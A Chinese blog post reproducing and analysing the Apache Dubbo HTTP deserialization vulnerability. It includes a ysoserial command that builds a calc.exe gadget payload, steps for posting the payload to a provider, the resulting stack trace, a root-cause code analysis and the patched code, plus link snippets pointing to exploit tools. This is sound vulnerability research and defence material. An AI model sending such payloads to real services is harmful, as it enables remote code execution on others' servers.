java反序列化漏洞利用工具_Apache Dubbo 反序列化漏洞

最新推荐文章于 2024-07-15 22:02:35 发布
最新推荐文章于 2024-07-15 22:02:35 发布
阅读量567 收藏
点赞数
文章标签: java反序列化漏洞利用工具 shiro反序列化漏洞修复

Apache Dubbo 反序列化漏洞

早在2019年开发者社区就有谈到这个 http 协议漏洞问题,近期360灵腾安全实验室判断漏洞等级为高,利用难度低,威胁程度高。 建议升级 dubbo 版本,避免遭受黑客攻击。

漏洞描述

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP.

简单的说,就是HTTP remoting 开启的时候,存在反序列化漏洞。 Apache Dubbo在接受来自消费者的远程调用请求的时候存在一个不安全的反序列化行为,最终导致了远程任意代码执行。

影响版本:

Dubbo 2.7.0 to 2.7.6Dubbo 2.6.0 to 2.6.7Dubbo all 2.5.x versions

漏洞复现

  1. 创建一个 Dubbo 服务提供者代码。 暴出的漏洞是 http 协议的,故使用 http 的 demo 来重现

注: 可自己简单写一个,也可官网下载 demo

  • https://github.com/apache/dubbo-samples/tree/master/java/dubbo-samples-http

dubbo 版本改成 2.7.5 之前的版本,比如:2.7.3. 在项目 pom 中添加 commons-collections4 依赖(测试漏洞用,主要用于反序列化)

org.apache.commons    commons-collections4    4.0

启动服务,可以看大 dubboadmin上有个服务注册了

b33e84c548ea984b627fbfa1750098f2.png

image

  1. 下载反序列化工具 ysoserial 利用漏洞执行 相关服务器上的命令,例如这里是启动 计算器, ysoserial可以随意生成一个序列化文件,如下:

https://repository.mulesoft.org/nexus/content/repositories/public/com/github/frohoff/ysoserial/0.0.5/ysoserial-0.0.5.jar

生成漏洞代码保存到 payload.ser 中:(可以调用 windows 的计算器程序)

java -jar ysoserial-0.0.5.jar CommonsCollections2 "calc.exe" > payload.ser
  1. 调用 provider

这里使用的是 postman 发包,也可使用 burp 发包。

  • https://www.postman.com/downloads/

发数据包的时候选择上一步生成的进制文件 payload.ser,会发现

9a1999fb9c162f8c98a7ea935669342a.png

image

demo 执行报错如下:

java.lang.NullPointerException at com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet.postInitialization(Unknown Source) at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getTransletInstance(Unknown Source) at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(Unknown Source) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at org.apache.commons.collections4.functors.InvokerTransformer.transform(InvokerTransformer.java:129) at org.apache.commons.collections4.comparators.TransformingComparator.compare(TransformingComparator.java:81) at java.util.PriorityQueue.siftDownUsingComparator(Unknown Source) at java.util.PriorityQueue.siftDown(Unknown Source) at java.util.PriorityQueue.heapify(Unknown Source) at java.util.PriorityQueue.readObject(Unknown Source) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source) at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source) at java.lang.reflect.Method.invoke(Unknown Source) at java.io.ObjectStreamClass.invokeReadObject(Unknown Source) at java.io.ObjectInputStream.readSerialData(Unknown Source) at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source) at java.io.ObjectInputStream.readObject0(Unknown Source) at java.io.ObjectInputStream.readObject(Unknown Source) at org.springframework.remoting.rmi.RemoteInvocationSerializingExporter.doReadRemoteInvocation(RemoteInvocationSerializingExporter.java:144) at org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter.readRemoteInvocation(HttpInvokerServiceExporter.java:121) at org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter.readRemoteInvocation(HttpInvokerServiceExporter.java:100) at org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter.handleRequest(HttpInvokerServiceExporter.java:79) at org.apache.dubbo.rpc.protocol.http.HttpProtocol$InternalHandler.handle(HttpProtocol.java:216) at org.apache.dubbo.remoting.http.servlet.DispatcherServlet.service(DispatcherServlet.java:61) at javax.servlet.http.HttpServlet.service(HttpServlet.java:790)

漏洞原因

dubbo 在进行 HTTP 协议进行数据传输时,使用的时 Java 序列化。使用 wireshark 抓包可以看到 ,从 ContentType: application/x-java-serialized-object 和报文 Body 部分的 ASCII 码可以看出,使用的是 Java Serialize 序列化。如果伪造了一个序列号的对象进入请求数据报文,然后伪造对象被反序列化出来后执行了,就造成了侵入,形成漏洞。

看 2.5.10 HttpProtocol 的 handle 方法实现

private class InternalHandler implements HttpHandler {  public void handle(HttpServletRequest request, HttpServletResponse response)          throws IOException, ServletException {      String uri = request.getRequestURI();      HttpInvokerServiceExporter skeleton = skeletonMap.get(uri);      if (!request.getMethod().equalsIgnoreCase("POST")) {          response.setStatus(500);      } else {          RpcContext.getContext().setRemoteAddress(request.getRemoteAddr(), request.getRemotePort());          try {              skeleton.handleRequest(request, response);          } catch (Throwable e) {              throw new ServletException(e);          }      }  }}

原因是使用的是 spring httpinvoker 功能 HttpInvokerServiceExporter

  • https://docs.spring.io/spring/docs/5.0.4.RELEASE/spring-framework-reference/integration.html#remoting-httpinvoker

spring httpinvoker 做了风险提示:

d0e8294bbb023bedab620adda00e7820.png

image

大致意思是,由于不安全的 Java 反序列化而导致的漏洞:操纵输入流可能会在反序列化步骤中导致服务器上不必须的代码执行

继续查看 skeleton.handleRequest(request, response); 的实现。

  public void handleRequest(HttpServletRequest request, HttpServletResponse response)   throws ServletException, IOException {  try {   RemoteInvocation invocation = readRemoteInvocation(request);   RemoteInvocationResult result = invokeAndCreateResult(invocation, getProxy());   writeRemoteInvocationResult(request, response, result);  }  catch (ClassNotFoundException ex) {   throw new NestedServletException("Class not found during deserialization", ex);  } }  protected RemoteInvocation readRemoteInvocation(HttpServletRequest request, InputStream is)   throws IOException, ClassNotFoundException {  ObjectInputStream ois = createObjectInputStream(decorateInputStream(request, is));  try {   return doReadRemoteInvocation(ois);  }  finally {   ois.close();  } }protected RemoteInvocation doReadRemoteInvocation(ObjectInputStream ois)   throws IOException, ClassNotFoundException {//  1. 恶意对象在此被反序列化,漏洞触发  Object obj = ois.readObject();  if (!(obj instanceof RemoteInvocation)) {   throw new RemoteException("Deserialized object needs to be assignable to type [" +     RemoteInvocation.class.getName() + "]: " + ClassUtils.getDescriptiveType(obj));  }  return (RemoteInvocation) obj; }

ois.readObject(); 读取数据全程过程中没有做任何的检查和过滤,直接使用的是readObject 方法直接反序列化 ,这个过程在如果没有校验和过滤,导致如果传入了序列化对象可以被反序列对象创建,漏洞就触发了。

漏洞解决

避免实现反序列化,对请求报文不进行反序列化处理。

看下 dubbo 2.7.7 之后的 HttpPrptocol 实现。

  private class InternalHandler implements HttpHandler {        private boolean cors;        public InternalHandler(boolean cors) {            this.cors = cors;        }        @Override        public void handle(HttpServletRequest request, HttpServletResponse response)                throws ServletException {            String uri = request.getRequestURI();            JsonRpcServer skeleton = skeletonMap.get(uri);            if (cors) {                response.setHeader(ACCESS_CONTROL_ALLOW_ORIGIN_HEADER, "*");                response.setHeader(ACCESS_CONTROL_ALLOW_METHODS_HEADER, "POST");                response.setHeader(ACCESS_CONTROL_ALLOW_HEADERS_HEADER, "*");            }            if (request.getMethod().equalsIgnoreCase("OPTIONS")) {                response.setStatus(200);            } else if (request.getMethod().equalsIgnoreCase("POST")) {                RpcContext.getContext().setRemoteAddress(request.getRemoteAddr(), request.getRemotePort());                try {                    skeleton.handle(request.getInputStream(), response.getOutputStream());                } catch (Throwable e) {                    throw new ServletException(e);                }            } else {                response.setStatus(500);            }        }    }public void handle(ResourceRequest request, ResourceResponse response)  throws IOException {  if (LOGGER.isLoggable(Level.FINE)) {   LOGGER.log(Level.FINE, "Handing ResourceRequest "+request.getMethod());  }  // set response type  response.setContentType(JSONRPC_RESPONSE_CONTENT_TYPE);  // setup streams  InputStream input  = null;  OutputStream output = response.getPortletOutputStream();  // POST  if (request.getMethod().equals("POST")) {   input = request.getPortletInputStream();  // GET  } else if (request.getMethod().equals("GET")) {   input = createInputStream(    request.getParameter("method"),    request.getParameter("id"),    request.getParameter("params"));  // invalid request  } else {   throw new IOException(    "Invalid request method, only POST and GET is supported");  }  // service the request  handle(input, output);  //fix to not flush within handle() but outside so http status code can be set  output.flush(); }

看下 handle 怎么处理的 使用的是 JsonRpcServer 的 handle 方法

  public int handle(InputStream ips, OutputStream ops)  throws IOException {  // get node iterator  ReadContext ctx = ReadContext.getReadContext(ips, mapper);  // prcess  JsonNode jsonNode = null;  try {   ctx.assertReadable();   jsonNode = ctx.nextValue();  } catch (JsonParseException e) {   writeAndFlushValue(ops, createErrorResponse(    "jsonrpc", "null", -32700, "Parse error", null));   return -32700;  }  return handleNode(jsonNode, ops); }

JsonRpcServer 类的 handle 方法处理之后,request.getInputStream() 没有再被反序列化,被篡改的序列化对象,无法被反序列化,这样漏洞就失效了。

weixin_39579468
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 817
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 690
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
Apache Dubbo(CVE-2023-23638)POC/EXP利用工具
潇湘信安的博客
06-02 411
工具支持CVE-2023-23638在Dubbo 3.x的完整利用,覆盖服务发现到漏洞利用及回显。在Dubbo 2.x版本也可以利用,需要自行传入服务名、方法名等。
Java反序列化漏洞详解(易懂)
最新发布
weixin_63350467的博客
07-15 1153
这篇文章主要还是让大家简单理解为啥会出现这个漏洞,以及查找漏洞的流程。对于java的序列化,反射,类加载等知识点的详细内容,大家可以自己感兴趣找找。这里主要还是让和我一样的小白简单理解一下这个漏洞的原理。
Dubbo 爆出严重漏洞
Java技术栈,分享最主流的Java技术
02-16 2266
2020年2月13日,Apache Dubbo出现了一个较为严重的漏洞反序列化漏洞漏洞编号:CVE-2019-17564)。攻击者利用该漏洞,可在目标网站上远程执行恶意代码,最终导致...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java反序列化漏洞利用工具.zip
04-10
标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Javaweb安全——Dubbo 反序列化(一)
weixin_43610673的博客
02-13 1449
Apache Dubbo 是一款 RPC 服务开发框架。智能容错和负载均衡,以及服务自动注册和发现。
java反序列化工具_Java反序列化终极测试工具|
weixin_39928818的博客
02-12 3964
java反序列化终极测试工具是一款测试可以检测java反序列化漏洞的检测软件,用户通过软件可以很轻松的将java反序列化漏洞给找出来,其操作性也非常的简单,感兴趣的朋友快来IT猫扑下载吧!Java反序列化漏洞产生的原因在java编写的web应用与web服务器间java通常会发送大量的序列化对象例如以下场景:HTTP请求中的参数,cookies以及Parameters。RMI协议,被广泛使用的RMI...
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
09-05
Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip
Java反序列化终极测试工具.zip
04-10
Java反序列化终极测试工具(里面有两款)
java反序列化终极测试工具.zip
04-28
java反序列化终极工具,含有JBoss,websphere,weblogic等反序列化漏洞利用
Java反序列化终极测试工具
09-17
Java反序列化终极测试工具
fastjson 序列化 不包括转义字符_Java 反序列化工具 gadgetinspector 初窥 (上)
weixin_39899021的博客
11-20 307
作者:Longofo@知道创宇404实验室时间:2019年9月4日起因一开始是听@Badcode师傅说的这个工具,在Black Hat 2018的一个议题提出来的。这是一个基于字节码静态分析的、利用已知技巧自动查找从source到sink的反序列化利用链工具。看了几遍作者在Black Hat上的演讲视频[1]与PPT[2],想从作者的演讲与PPT中获取更多关于这个工具的原理性的东西,可是...
java反序列化工具_Java反序列化过程深究
weixin_39562327的博客
11-29 123
No.1声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.2概述互联网上大家针对Java反序列化的讨论有很多了,但是这里我还...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值